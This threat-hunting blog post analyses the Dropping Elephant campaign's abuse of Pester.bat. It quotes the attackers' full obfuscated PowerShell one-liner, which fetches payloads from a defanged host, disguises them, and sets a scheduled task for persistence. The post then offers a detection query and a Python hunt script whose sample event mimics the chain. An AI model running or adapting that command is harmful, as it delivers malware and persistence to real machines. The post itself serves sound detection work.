207. Dropping Elephant Misuses Pester to Execute Malicious PowerShell Commands
Hello everyone!
Let's look at how adversaries leverage the following technique - System Script Proxy Execution (T1216). But we need an example, of course. And we have it! The Dropping Elephant campaign against Turkish defense contractors described by Arctic Wolf.
Once again the threat actors used malicious LNK files. And this time they abused Pester.bat to execute malicious PowerShell commands:
"C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ;powershell s''l''eep 1;$ProgressPreference = 'SilentlyContinue';$a='https:';$b='C:\Users\';$c='C:\Windows\';wg''et $a//expouav[.]org/download/fetch/list3/12717/view/0d5a0411-0a85-42cf-928c-dd9218019f3b -OutFile $b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf;s''ap''s "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf";wg''et $a//expouav[.]org/download/fetch/list7/40275/view/e49c7ae0-f3d1-4073-83bb-b4ecba929fec -Outfile $c\Tasks\lama;r''e''n -Path "$c\Tasks\lama" -NewName "$c\Tasks\vlc.pepxpe";r''e''n -Path "$c\Tasks\vlc.pepxpe" -NewName ((Split-Path "$c\Tasks\vlc.pepxpe" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list5/19577/view/b5aaa6f0-6259-4ccb-b31a-d21e40c2eeff -Outfile $c\Tasks\lake;r''e''n -Path "$c\Tasks\lake" -NewName "$c\Tasks\libvlc.pdplpl";r''e''n -Path "$c\Tasks\libvlc.pdplpl" -NewName ((Split-Path "$c\Tasks\libvlc.pdplpl" -Leaf) -replace "p", "");wg''et $a//expouav[.]org/download/fetch/list6/41568/view/701bbff4-8fcb-4e9c-8577-00aed06d8443 -Outfile $c\Tasks\dalai;r''e''n -Path "$c\Tasks\dalai" -NewName "$c\Tasks\Winver.pepxpe";r''e''n -Path "$c\Tasks\Winver.pepxpe" -NewName ((Split-Path "$c\Tasks\Winver.pepxpe" -Leaf) -replace "p", "");c''p''i "$b\Public\Unmanned_Vehicle_Systems_Conference_2025_In_Istanbul.pdf" -destination .;wg''et $a//expouav[.]org/download/fetch/list8/20041/view/c6795195-6e84-4720-9420-e03da09b2187 -OutFile $c\Tasks\vlc.log;$d="$c\Tasks\Winver";s''ap''s $d -a "/Create", '/sc', 'minute', '/tn', 'NewErrorReport', '/tr', "$c\Tasks\vlc", '/f';e''r''a''s''e *d?.?n?
As Pester.bat is rarely launched during normal activity, we can build a simple hunting query:
event_type: "processcreatewin"
AND
proc_file_path: "cmd.exe"
AND
cmdline: "pester.bat"
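To show how this hunt behaves on real telemetry, here is an added Python example (not from the post or from Arctic Wolf) that ports the query above to code and runs it over a few constructed process-creation events. It also strips the empty-quote token splitting seen in the quoted command line (wg''et, s''ap''s, r''e''n, e''r''a''s''e) so the PowerShell aliases become visible to an analyst; the field names, the sample events and the alias list are assumptions made for this example.

```python
import re
from typing import Dict, List

# Sample process-creation events, constructed for this example. Field names follow
# the hunting query from the post; the values are not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # mimics the LNK -> cmd.exe -> Pester.bat -> powershell chain from the post
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": (
            r'cmd.exe /c "C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" '
            r";powershell s''l''eep 1;$a='https:';$b='C:\Users\';"
            r"wg''et $a//example.invalid/payload -OutFile $b\Public\lure.pdf;"
            r"s''ap''s $b\Public\lure.pdf;r''e''n -Path $b\Public\x -NewName $b\Public\y;"
            r"e''r''a''s''e *d?.?n?"
        ),
    },
    {   # benign: Pester used the normal way, from a PowerShell host
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -Command Invoke-Pester -Path .\tests",
    },
    {   # benign: an ordinary cmd.exe invocation
        "event_type": "processcreatewin",
        "proc_file_path": r"C:\Windows\System32\cmd.exe",
        "cmdline": r"cmd.exe /c dir C:\Users\Public",
    },
]

# Empty quote pairs inside a PowerShell token are a no-op, which is why
# wg''et runs as wget. Removing them restores the original word.
_SPLIT_QUOTES = re.compile("''|\"\"")

# PowerShell aliases present in the Dropping Elephant one-liner plus a few
# common download/execute aliases (assumed list, extend to taste).
SUSPICIOUS_ALIASES = {"wget", "iwr", "curl", "saps", "start", "ren",
                      "cpi", "erase", "sleep", "iex"}

_WORD = re.compile(r"[A-Za-z][A-Za-z0-9-]*")


def deobfuscate(cmdline: str) -> str:
    """Join tokens that were split with empty quote pairs (wg''et -> wget)."""
    return _SPLIT_QUOTES.sub("", cmdline)


def find_aliases(cmdline: str) -> List[str]:
    """Return the suspicious PowerShell aliases found after de-obfuscation, sorted."""
    text = deobfuscate(cmdline).lower()
    return sorted({w for w in _WORD.findall(text) if w in SUSPICIOUS_ALIASES})


def matches_pester_hunt(event: Dict[str, str]) -> bool:
    """Port of the post's query: a cmd.exe process creation whose command line
    names pester.bat. The image is compared by basename so a full path matches."""
    if event.get("event_type") != "processcreatewin":
        return False
    image = event.get("proc_file_path", "").replace("/", "\\").rsplit("\\", 1)[-1]
    if image.lower() != "cmd.exe":
        return False
    return "pester.bat" in event.get("cmdline", "").lower()


def hunt(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run the hunt and enrich each hit with the de-obfuscated command line
    and the aliases it uses, which is what a triage analyst wants to see first."""
    hits = []
    for event in events:
        if matches_pester_hunt(event):
            hits.append({
                "proc_file_path": event["proc_file_path"],
                "cmdline_deobfuscated": deobfuscate(event["cmdline"]),
                "aliases": find_aliases(event["cmdline"]),
            })
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["proc_file_path"])
        print("  aliases:", ", ".join(hit["aliases"]))
        print("  cmdline:", hit["cmdline_deobfuscated"])
```

The two benign events do not match: the normal Pester run comes from powershell.exe rather than cmd.exe, and the plain cmd.exe event never mentions pester.bat. The alias list is an enrichment for triage, not a second detection condition; a hit on Pester.bat from cmd.exe is already rare enough to be worth a look on its own.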
See you tomorrow!